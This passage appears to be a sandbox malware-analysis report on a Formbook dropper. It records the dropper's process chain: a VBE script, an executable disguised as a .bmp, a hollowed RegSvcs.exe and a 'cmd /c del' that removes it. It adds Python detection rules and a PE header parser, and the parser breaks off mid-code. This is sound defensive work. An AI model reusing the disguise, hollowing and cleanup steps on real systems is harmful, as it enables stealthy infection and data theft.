Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 037D7E54 appears 111 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: String function: 0018FD60 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: String function: 00190DC0 appears 46 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041A320 NtCreateFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041A3D0 NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041A450 NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041A500 NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041A2DB NtCreateFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041A3CA NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712B60 NtClose,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712F90 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01714340 NtSetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01714650 NtSuspendThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712BE0 NtQueryValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712BA0 NtEnumerateValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712B80 NtQueryInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712AF0 NtWriteFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712AB0 NtWaitForSingleObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712D00 NtSetInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712DB0 NtEnumerateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712C60 NtCreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712C00 NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712CF0 NtOpenProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712CC0 NtQueryVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712F60 NtCreateProcessEx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712FA0 NtQuerySection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712E30 NtWriteVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01712EE0 NtQueueApcThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01713010 NtOpenDirectoryObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01713090 NtSetValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_017135C0 NtCreateMutant
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_017139B0 NtGetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01713D70 NtOpenThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01713D10 NtOpenProcessToken
Source: C:\Windows\explorer.exe | Code function: 15_2_1069D232 NtCreateFile
Source: C:\Windows\explorer.exe | Code function: 15_2_1069EE12 NtProtectVirtualMemory
Source: C:\Windows\explorer.exe | Code function: 15_2_1069EE0A NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A564CA NtQueryInformationToken
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A54823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A5643A NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A67460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A6C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A6A135 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A56500 NtQueryInformationToken,NtQueryInformationToken
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A44E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A54759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C4340 NtSetContextThread
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C4650 NtSuspendThread
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2AF0 NtWriteFile
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2FB0 NtResumeThread
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C3090 NtSetValueKey
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C39B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C3D70 NtOpenThread
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037C3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B6A3D0 NtReadFile
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B6A320 NtCreateFile
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B6A450 NtClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B6A2DB NtCreateFile
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B6A3CA NtReadFile
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_00506FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: Payment_Advice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@105/31@10/8
Source: C:\Users\user\Desktop\Payment_Advice.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_00506C74 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0051A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: Payment_Advice.exe | ReversingLabs: Detection: 44%
Source: Payment_Advice.exe | Virustotal: Detection: 48%
Source: C:\Users\user\Desktop\Payment_Advice.exe | File read: C:\Users\user\Desktop\Payment_Advice.exe
Source: C:\Users\user\Desktop\Payment_Advice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Payment_Advice.exe C:\Users\user\Desktop\Payment_Advice.exe
Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpg
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp ewdbwwfpdh.bmp fjrpidauk.jpg
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
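The process chain recorded above is the part of this report a detection engineer can act on: the SFX drops pis-e.vbe into Temp\RarSFX0 and runs it through wscript.exe; the script starts ewdbwwfpdh.bmp, an executable with an image extension, with fjrpidauk.jpg as its argument; that process launches RegSvcs.exe with an empty command line, which is where the Formbook payload is found in memory; and explorer.exe later spawns a 32-bit cmd.exe whose child deletes RegSvcs.exe. The following is an added example, not part of the Joe Sandbox report: Python detection logic run over process-creation events constructed from the 'Process created' lines above. The event fields, the rule names and every PID except the three the report gives (6052, 6108, 636) are assumptions; conhost.exe launches are left out.

```python
# Added example (not part of the Joe Sandbox report): rules for the process
# chain the report records, run over constructed process-creation events.
# Field names, rule names and the invented PIDs are assumptions.
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full path of the created process
    cmdline: str  # command line it was started with


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = {".vbe", ".vbs", ".js", ".jse", ".wsf"}
DECOY_EXTS = {".bmp", ".jpg", ".jpeg", ".png", ".gif", ".txt", ".pdf"}
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
# user-writable locations an SFX archive or script host typically drops into
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|Temp|ProgramData)\\", re.IGNORECASE)


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def ext(path: str) -> str:
    return ntpath.splitext(path)[1].lower()


def bare_cmdline(e: ProcEvent) -> bool:
    """True when the process was started with no arguments at all."""
    return e.cmdline.strip().strip('"').lower() == e.image.lower()


def analyse(events):
    """Return (rule, pid) findings; events must be in creation order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    hollow_hosts = set()  # images flagged by rule 3, consulted by rule 4
    for e in events:
        parent = by_pid.get(e.ppid)
        name = base(e.image)
        # 1. script host running a script from a user-writable directory
        if name in SCRIPT_HOSTS and any(
                ext(a) in SCRIPT_EXTS and USER_WRITABLE.search(a)
                for a in re.findall(r'"([^"]+)"', e.cmdline)):
            findings.append(("script_host_from_temp", e.pid))
        # 2. a file with a non-executable extension was actually executed
        if ext(e.image) in DECOY_EXTS:
            findings.append(("decoy_extension_executed", e.pid))
        # 3. .NET utility started with no arguments by a parent in a user-writable path
        if (name in DOTNET_HOSTS and parent is not None
                and USER_WRITABLE.search(parent.image) and bare_cmdline(e)):
            findings.append(("hollowing_host_no_args", e.pid))
            hollow_hosts.add(e.image.lower())
        # 4. the binary used as hollowing host is deleted afterwards
        if name == "cmd.exe":
            m = re.search(r'\bdel\s+"?([^"]+?)"?\s*$', e.cmdline, re.IGNORECASE)
            if m and m.group(1).lower() in hollow_hosts:
                findings.append(("hollowing_host_deleted", e.pid))
        # 5. explorer.exe spawning a 32-bit system binary with no arguments
        if (parent is not None and base(parent.image) == "explorer.exe"
                and "\\syswow64\\" in e.image.lower() and bare_cmdline(e)):
            findings.append(("explorer_spawns_wow64_bare", e.pid))
    return findings


# Constructed events modelled on the report's 'Process created' lines.
NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
TMP = r"C:\Users\user\AppData\Local\Temp\RarSFX0"
EVENTS = [
    ProcEvent(2000, 1, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(1000, 1, r"C:\Users\user\Desktop\Payment_Advice.exe",
              r"C:\Users\user\Desktop\Payment_Advice.exe"),  # parent unknown in the report
    ProcEvent(1001, 1000, r"C:\Windows\SysWOW64\wscript.exe",
              '"C:\\Windows\\System32\\WScript.exe" "' + TMP + '\\pis-e.vbe"'),
    ProcEvent(1002, 1001, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpg'),
    ProcEvent(6052, 1002, TMP + "\\ewdbwwfpdh.bmp", "ewdbwwfpdh.bmp fjrpidauk.jpg"),
    ProcEvent(1003, 1001, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c ipconfig /renew'),
    ProcEvent(1004, 1003, r"C:\Windows\SysWOW64\ipconfig.exe", "ipconfig /renew"),
    ProcEvent(6107, 6052, NET, NET),  # the report lists two RegSvcs.exe launches
    ProcEvent(6108, 6052, NET, NET),
    ProcEvent(636, 2000, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(1005, 636, r"C:\Windows\SysWOW64\cmd.exe", '/c del "' + NET + '"'),
]

if __name__ == "__main__":
    for rule, pid in analyse(EVENTS):
        print(f"{rule:28s} pid={pid}")
```

Rules 3 and 4 are correlated through `hollow_hosts`: the delete is only interesting because the same image was just started empty-handed from a Temp directory, and on its own "cmd /c del" of a file under C:\Windows would be far too noisy. Rule 5 rests on a detail of this report, a SysWOW64 binary started by explorer.exe with nothing but its own path as command line; an interactive prompt opened by the user is the 64-bit System32\cmd.exe and does not match.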
          Source: C:\Users\user\Desktop\Payment_Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D194F AdjustTokenPrivileges,CloseHandle,6_2_001D194F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_001D1F53
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001F4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,6_2_001F4089
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_001E5B27
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,6_2_001DDC9C
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_03
          Source: C:\Users\user\Desktop\Payment_Advice.exeCommand line argument: sfxname0_2_0051DF1E
          Source: C:\Users\user\Desktop\Payment_Advice.exeCommand line argument: sfxstime0_2_0051DF1E
          Source: C:\Users\user\Desktop\Payment_Advice.exeCommand line argument: STARTDLG0_2_0051DF1E
          Source: C:\Users\user\Desktop\Payment_Advice.exeCommand line argument: xzU0_2_0051DF1E
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Payment_Advice.exe | Static file information: File size 1131860 > 1048576
          Source: Payment_Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Payment_Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Payment_Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Payment_Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Payment_Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Payment_Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Payment_Advice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Payment_Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Payment_Advice.exe
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 0000000F.00000002.3891932584.00000000122AF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842961223.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.0000000003C9F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1648193337.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1648028584.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1649872985.00000000035A6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1648104707.0000000001640000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842017169.0000000000A40000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1648193337.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000010.00000003.1648028584.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1649872985.00000000035A6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 0000000F.00000002.3891932584.00000000122AF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842961223.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.0000000003C9F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 0000000E.00000002.1648104707.0000000001640000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000010.00000002.3842017169.0000000000A40000.00000040.80000000.00040000.00000000.sdmp
          Source: Payment_Advice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Payment_Advice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Payment_Advice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Payment_Advice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Payment_Advice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
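The static PE facts listed above (the DllCharacteristics flags, which section each populated data directory falls in, and the extra .didat section, which is the MSVC linker's delay-load import section) can be reproduced with nothing but the standard library. The following is an added example, not code from Joe Sandbox or from the sample: parse_pe() reads a PE32 header with struct, and build_sample_header() fabricates a header whose flags, section names and directory placement mirror the report's findings; the RVAs and sizes in it are invented.

```python
"""Static PE header triage with struct only (no pefile dependency).

Added example for this report, not Joe Sandbox code.  build_sample_header()
fabricates a PE32 header whose section names, DllCharacteristics bits and
populated data directories mirror the static findings in the report; the
RVAs and sizes are invented.  parse_pe() is the reusable part and works on
the first few KiB of any PE32 file read from disk.
"""
import struct

# IMAGE_DLLCHARACTERISTICS_* bits (PE/COFF specification).
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# IMAGE_DIRECTORY_ENTRY_* indices into the optional header's data directory.
DATA_DIRECTORIES = {
    1: "IMAGE_DIRECTORY_ENTRY_IMPORT",
    2: "IMAGE_DIRECTORY_ENTRY_RESOURCE",
    5: "IMAGE_DIRECTORY_ENTRY_BASERELOC",
    6: "IMAGE_DIRECTORY_ENTRY_DEBUG",
    10: "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
    12: "IMAGE_DIRECTORY_ENTRY_IAT",
}


def parse_pe(data: bytes) -> dict:
    """Return DllCharacteristics names, section names and a directory -> section map."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER (20 bytes)
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(num_dirs)]

    sections = []                                         # (name, rva, virtual size)
    for i in range(num_sections):
        name, vsize, rva = struct.unpack_from("<8sII", data, opt + size_opt + 40 * i)
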